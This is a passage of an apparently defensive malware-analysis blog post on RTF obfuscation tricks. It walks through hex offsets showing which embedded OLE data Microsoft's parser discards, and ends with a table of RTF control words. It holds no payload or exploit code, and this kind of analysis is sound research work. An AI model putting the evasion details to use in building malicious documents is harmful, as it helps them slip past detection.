<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyo25X0ZvVuai8-rb5gVj-RsMdePwjRnnEUw4_Qgh9ELitIn6BHdK6IKfkTjhStwzUrQ357_SxpIYc1gpG1UZVl09QJh-jOknNolWSdfEB48pokbNGUK7wSuKAXUQzI6mLwPe5iZnpoIV_/s1600/Screenshot+from+2018-11-12+22-39-06.png" />
</a>
</div>
</div>
<div>
An interesting group at line 95 contains a non-printable character followed by a hex string. This group is also
preceded by the destination control word '\*'.
</div>
<br>
<div>
<button id="animation8Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation8')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation8" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8_fh5hVP8l4Ed-jCWoUvKOvl3mjumhpENINHfFEt_PaUk9xRhBYKK5vyx0iKoYVi9GApcJfqH_BXCeL8fVt7cSjjnHMARkf0g7vAKXlvXg_Dv5-_895GUN2b0PMkxOn8-as8QwochSWUs/s1600/Screenshot+from+2018-11-12+22-42-15.png">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8_fh5hVP8l4Ed-jCWoUvKOvl3mjumhpENINHfFEt_PaUk9xRhBYKK5vyx0iKoYVi9GApcJfqH_BXCeL8fVt7cSjjnHMARkf0g7vAKXlvXg_Dv5-_895GUN2b0PMkxOn8-as8QwochSWUs/s1600/Screenshot+from+2018-11-12+22-42-15.png" />
</a>
</div>
</div>
<div>
Another group (line 100) contains 2 control words.
</div>
<br>
<div>
<button id="animation9Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation9')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation9" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjORcnX3SQEi3E8Gk_AS69zTOiMx91Pa1FrMrPiP7rgqu16_h1uq1Q3CAXM552L0UhDVeV9Nu61ASl2NWs7XN-4b7Xcl-KYIAX-f0GdRZOje8iuRRCZJaRTTYGI-xWLsz-m4aYLZaMzBipx/s1600/Screenshot+from+2018-11-12+22-45-31.png">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjORcnX3SQEi3E8Gk_AS69zTOiMx91Pa1FrMrPiP7rgqu16_h1uq1Q3CAXM552L0UhDVeV9Nu61ASl2NWs7XN-4b7Xcl-KYIAX-f0GdRZOje8iuRRCZJaRTTYGI-xWLsz-m4aYLZaMzBipx/s1600/Screenshot+from+2018-11-12+22-45-31.png" />
</a>
</div>
</div>
<div>
A sequence of escaped expressions begins at line 103.
</div>
<br>
<div>
<button id="animation10Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation10')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation10" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeunUpLwqG2N9u2KkXGtj4W9DVwmuW8vT85dPRvk9dYOhzxbXQASlzdAEZtbs3FXU9BwX6KBp3597FIojmwAwkYQLNhKzqVuTpKZQ4gVbRV5mcXzJRiFcffEwePNfiitlRr8CryTDbNDUQ/s1600/Screenshot+from+2018-11-12+22-48-56.png">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeunUpLwqG2N9u2KkXGtj4W9DVwmuW8vT85dPRvk9dYOhzxbXQASlzdAEZtbs3FXU9BwX6KBp3597FIojmwAwkYQLNhKzqVuTpKZQ4gVbRV5mcXzJRiFcffEwePNfiitlRr8CryTDbNDUQ/s1600/Screenshot+from+2018-11-12+22-48-56.png" />
</a>
</div>
</div>
<div>
The last interesting piece for us is on line 111, where the <b>\bin</b> control word is used to convert the 'P'
character into a hex value.
</div>
<br>
<div>
<button id="animation11Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation11')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation11" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihLnWQaPGOos5i8bPkk7g0fkmZ79Bvq-HAuGKibnlyHZjAWPuHWMn0ZIVBcGqVekv70AqSXpr19LvHY92TQH4NWyoMmzFLRw0PI-Mdl_BYWCBTr7RWuxPIo9qUPVHXpQ94pqzTqsH1pRUc/s1600/Screenshot+from+2018-11-12+22-51-45.png">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihLnWQaPGOos5i8bPkk7g0fkmZ79Bvq-HAuGKibnlyHZjAWPuHWMn0ZIVBcGqVekv70AqSXpr19LvHY92TQH4NWyoMmzFLRw0PI-Mdl_BYWCBTr7RWuxPIo9qUPVHXpQ94pqzTqsH1pRUc/s1600/Screenshot+from+2018-11-12+22-51-45.png" />
</a>
</div>
</div>
<div>
Now open the OLE object carved from memory in a hex viewer/editor. The carved object begins with the
following bytes: <b>88 D1 4E 04 02 00 00 00</b>. The same sequence can be found in the original RTF sample file
starting at line 80. This means that all the data from the beginning of the 'objdata' group (line 67) up to
line 80 has been discarded. This includes the 2 groups and the sequence of <b>\'</b> special characters we
noted earlier.
</div>
<br>
<div class="row">
<div class="col-6 text-center">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfkoZIoUc2jlglvtv3tckmFRgV14kLHmG5AiuTPnnMPb1RwXGutI8gtmi8srpb10lSnhQMBZdKy7evDQuPIQRlmAGHw05ScnJp058Zy0lrQok0snbb6EegIoAo_14fOnoo0pU1Mh8wl-b3/s1600/Screenshot+from+2018-11-12+22-55-52.png">
<img class="rounded" style="width: 90%" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfkoZIoUc2jlglvtv3tckmFRgV14kLHmG5AiuTPnnMPb1RwXGutI8gtmi8srpb10lSnhQMBZdKy7evDQuPIQRlmAGHw05ScnJp058Zy0lrQok0snbb6EegIoAo_14fOnoo0pU1Mh8wl-b3/s1600/Screenshot+from+2018-11-12+22-55-52.png" />
</a>
</div>
<div class="col-6 text-center">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDrS9-EdVjt7YHCukyk2JsZakDTSjdiDdUJrR01a3M0aLgsNyMviyYP8wkk2815q4qsuACDqxrsM5zNxUf0ND_RYYRLvAhQ_RPqhoPkrwCL5JBmSJhyphenhyphenKqG8FedcTpTpK7HbfCxTDIpgOri/s1600/Screenshot+from+2018-11-12+23-01-48.png">
<img class="rounded" style="width: 90%" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDrS9-EdVjt7YHCukyk2JsZakDTSjdiDdUJrR01a3M0aLgsNyMviyYP8wkk2815q4qsuACDqxrsM5zNxUf0ND_RYYRLvAhQ_RPqhoPkrwCL5JBmSJhyphenhyphenKqG8FedcTpTpK7HbfCxTDIpgOri/s1600/Screenshot+from+2018-11-12+23-01-48.png" />
</a>
</div>
</div>
<br>
<div>
The data from the interesting group at line 95 does not appear to be present in the carved OLE object. We can
easily locate the data preceding it - <b>00 6F 00 74 00 20 00 45 00 6E 00 74 00 72 00</b> (offset 0x42D), but
not the data from the group itself. Byte <b>79</b> (offset 0x43C) follows the preceding data directly, meaning the
interesting group's data has been discarded.
</div>
<br>
<div class="row">
<div class="col-6 text-center">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGA_AC_sSwDNiZlBiIAzrLDLALxMqOVj21kyuTNzYUWyjaHUeXUNBnrOZb2HkJTugryiIC5dyvGHw_3p06mmPX75Ldmtium3pCiQ2YXuBRzkesuSW__euCXOHLH8F2ngpO7s_rjtTcjvQX/s1600/Screenshot+from+2018-11-12+23-08-29.png">
<img class="rounded" style="width: 90%" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGA_AC_sSwDNiZlBiIAzrLDLALxMqOVj21kyuTNzYUWyjaHUeXUNBnrOZb2HkJTugryiIC5dyvGHw_3p06mmPX75Ldmtium3pCiQ2YXuBRzkesuSW__euCXOHLH8F2ngpO7s_rjtTcjvQX/s1600/Screenshot+from+2018-11-12+23-08-29.png" />
</a>
</div>
<div class="col-6 text-center">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8_fh5hVP8l4Ed-jCWoUvKOvl3mjumhpENINHfFEt_PaUk9xRhBYKK5vyx0iKoYVi9GApcJfqH_BXCeL8fVt7cSjjnHMARkf0g7vAKXlvXg_Dv5-_895GUN2b0PMkxOn8-as8QwochSWUs/s1600/Screenshot+from+2018-11-12+22-42-15.png">
<img class="rounded" style="width: 90%" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8_fh5hVP8l4Ed-jCWoUvKOvl3mjumhpENINHfFEt_PaUk9xRhBYKK5vyx0iKoYVi9GApcJfqH_BXCeL8fVt7cSjjnHMARkf0g7vAKXlvXg_Dv5-_895GUN2b0PMkxOn8-as8QwochSWUs/s1600/Screenshot+from+2018-11-12+22-42-15.png" />
</a>
</div>
</div>
<br>
<div>
As expected, the data from the group at line 100 has been discarded, but the sequence of escaped expressions
does appear to be present in the carved OLE object. It begins at offset 0x43D and ends at 0x829.
</div>
<br>
<div>
<button id="animation12Button" type="button" class="btn btn-outline-info btn-sm" onclick="animationToggle('animation12')">Show</button>
</div>
<br>
<div>
<div class="text-center" id="animation12" style="display:none">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGi2ItRx_r_1kMzBSSdENlHMQCrEn6dIO7eanXKxQH8rodBcV6mfJ8pAr3qk0Yc7lRWQh5T_gUqSET42CuirWkEkPSWhj88Ehuz4y1dnZSzLPYxmJa2DIArQ2AyXzvFrNwCGS0lw5GgLJq/s1600/Peek+2018-11-12+23-41.gif">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGi2ItRx_r_1kMzBSSdENlHMQCrEn6dIO7eanXKxQH8rodBcV6mfJ8pAr3qk0Yc7lRWQh5T_gUqSET42CuirWkEkPSWhj88Ehuz4y1dnZSzLPYxmJa2DIArQ2AyXzvFrNwCGS0lw5GgLJq/s1600/Peek+2018-11-12+23-41.gif" />
</a>
</div>
</div>
<div>
The last piece of data we're interested in is the one supplied to the <b>\bin</b> control word. It's only 1
byte long and is represented by the 'P' character in the original RTF sample. We would expect it to
follow the sequence of escaped expressions and the plain text string <b>700</b> located at line 108.
</div>
<br>
<div class="text-center">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihLnWQaPGOos5i8bPkk7g0fkmZ79Bvq-HAuGKibnlyHZjAWPuHWMn0ZIVBcGqVekv70AqSXpr19LvHY92TQH4NWyoMmzFLRw0PI-Mdl_BYWCBTr7RWuxPIo9qUPVHXpQ94pqzTqsH1pRUc/s1600/Screenshot+from+2018-11-12+22-51-45.png">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihLnWQaPGOos5i8bPkk7g0fkmZ79Bvq-HAuGKibnlyHZjAWPuHWMn0ZIVBcGqVekv70AqSXpr19LvHY92TQH4NWyoMmzFLRw0PI-Mdl_BYWCBTr7RWuxPIo9qUPVHXpQ94pqzTqsH1pRUc/s1600/Screenshot+from+2018-11-12+22-51-45.png" />
</a>
</div>
<br>
<div>
Character <b>P</b> has a hex value of <b>50</b>. Our expected byte sequence is <b>70 05 00 00 02 D3</b>, but
interestingly enough, there is no such byte sequence present in the carved OLE object. Something isn't
the way we expected it to be after analysing the original RTF file manually. According to the native RTF parser,
this data transforms into the following byte sequence: <b>70 50 00 00 02 D3</b>.
</div>
<br>
<div class="text-center">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLAYpnXqtKPnFSgVuguzbYxlkXxzZ3S5qT6IwdENIuh3BsRrTqzRYmH31cdgbdFnW34H9w_sYospOSTmEjd9CqpgtYNUHtqZj4wT2a139-wNpjJq2oqdL_UEZ1Sb4q3iEe0DrQ2JtAYgNF/s1600/Screenshot+from+2018-11-12+23-16-55.png">
<img class="rounded" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLAYpnXqtKPnFSgVuguzbYxlkXxzZ3S5qT6IwdENIuh3BsRrTqzRYmH31cdgbdFnW34H9w_sYospOSTmEjd9CqpgtYNUHtqZj4wT2a139-wNpjJq2oqdL_UEZ1Sb4q3iEe0DrQ2JtAYgNF/s1600/Screenshot+from+2018-11-12+23-16-55.png" />
</a>
</div>
<br>
<div>
A couple of things to note here:
<ul>
<li>the last <b>0</b> in the <b>700</b> string disappears</li>
<li>the number of zeros after <b>50</b> (P converted to hex) is 5, not the expected 4</li>
</ul>
</div>
<br>
<div>
The last example shows how unexpected the results can be when trying to deobfuscate RTF-embedded OLE objects
manually. While doing it this way is fun and challenging, the only way to make sure the deobfuscation has been
successful is to compare it with the results of Microsoft's native RTF parser.
</div>
<hr>
<div class="container" id="credits">
<div>
<h4>Credits</h4>
</div>
<div>
Huge shout out to <a href="https://twitter.com/atorrrr">Andrew Torres</a> for a crash course on Microsoft
Office applications debugging with x32dbg and overall feedback. This dude is a wizard!
</div>
<div>
Kudos to <a href="https://twitter.com/decalage2">Decalage</a> and <a href="https://twitter.com/DidierStevens">Didier
Stevens</a> for peer reviewing the wall of text above. I really appreciate it, folks!
</div>
</div>
<hr>
<div class="container" id="external">
<div>
<h4>External References</h4>
</div>
<div>
<ul>
<li><a href="https://www.fireeye.com/blog/threat-research/2016/05/how_rtf_malware_evad.html">How RTF malware
evades static signature-based detection</a>
</li>
<li><a href="https://securelist.com/disappearing-bytes/84017/">Disappearing bytes: Reverse engineering the MS
Office RTF parser</a>
</li>
<li>
<a href="http://decalage.info/en/rtf_tricks">Anti-Analysis Tricks in Weaponized RTF</a>
</li>
<li>
<a href="https://www.microsoft.com/en-ie/download/details.aspx?id=10725">Word 2007: Rich Text Format (RTF)
Specification, version 1.9.1</a>
</li>
<li>
<a href="https://www.oreilly.com/library/view/rtf-pocket-guide/9781449302047/">RTF Pocket Guide</a>
</li>
</ul>
</div>
</div>
<hr>
<div class="container" id="appendix">
<h4>Appendix</h4>
<h5>Control Words Search Table</h5>
<div>
<input type="text" id="controlWordInput" class="form-control" onkeyup="controlWordSearch()" placeholder="Search for control word...">
</div>
<br>
<div style="overflow:auto; height:200px;">
<table class="table table-striped">
<thead>
<tr>
<th scope="col">Control Word</th>
<th scope="col">Destination Flag (FALSE)</th>
<th scope="col">Destination Flag (TRUE)</th>
</tr>
</thead>
<tbody id="controlWordTable">
<tr>
<th scope="row">ApplyBrkRules</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">abslock</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">additive</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">adjustright</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aenddoc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aendnotes</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">afelev</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnbj</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftncn</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">aftnnalc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnnar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnnauc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnnchi</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnnchosung</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnncnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnndbar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnndbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnndbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnndbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnndbnumt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnnganada</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnngbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnngbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnngbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnngbnuml</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnnrlc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnnruc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnnzodiac</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnnzodiacd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnnzodiacl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnrestart</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnrstcont</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">aftnsep</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">aftnsepc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">aftntj</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">allowfieldendsel</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">allprot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">alntblind</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">alt</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">annotation</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">annotprot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ansi</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">asianbrkrule</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">atnauthor</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">atndate</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">atnicn</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">atnid</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">atnparent</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">atnref</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">atntime</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">atrfend</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">atrfstart</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">author</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">autofmtoverride</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">background</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">bdbfhdr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bdrrlswsix</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bgbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bgcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bgdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bgdkbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bgdkcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bgdkdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bgdkfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bgdkhoriz</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bgdkvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bgfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bghoriz</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bgvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bkmkend</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">bkmkpub</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bkmkstart</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">blipuid</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">bookfold</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">bookfoldrev</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">box</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrbar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrbtw</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrdash</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrdashd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrdashdd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrdashdot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrdashdotdot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrdashdotstr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrdashsm</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrdb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrdot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdremboss</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrengrave</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrframe</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrhair</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrinset</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrnil</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrnone</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdroutset</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrs</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrsh</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrtbl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrth</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrthtnlg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrthtnmg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrthtnsg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrtnthlg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrtnthmg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrtnthsg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrtnthtnlg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrtnthtnmg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrtnthtnsg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrtriple</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrwavy</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brdrwavydb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">brkfrm</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">buptim</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">bxe</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">caccentfive</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">caccentfour</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">caccentone</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">caccentsix</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">caccentthree</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">caccenttwo</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cachedcolbal</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">category</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">cbackgroundone</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cbackgroundtwo</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cfollowedhyperlink</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbgbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbgcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbgdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbgdkbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbgdkcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbgdkdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbgdkfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbgdkhoriz</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbgdkvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbgfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbghoriz</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbgvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">chbrdr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
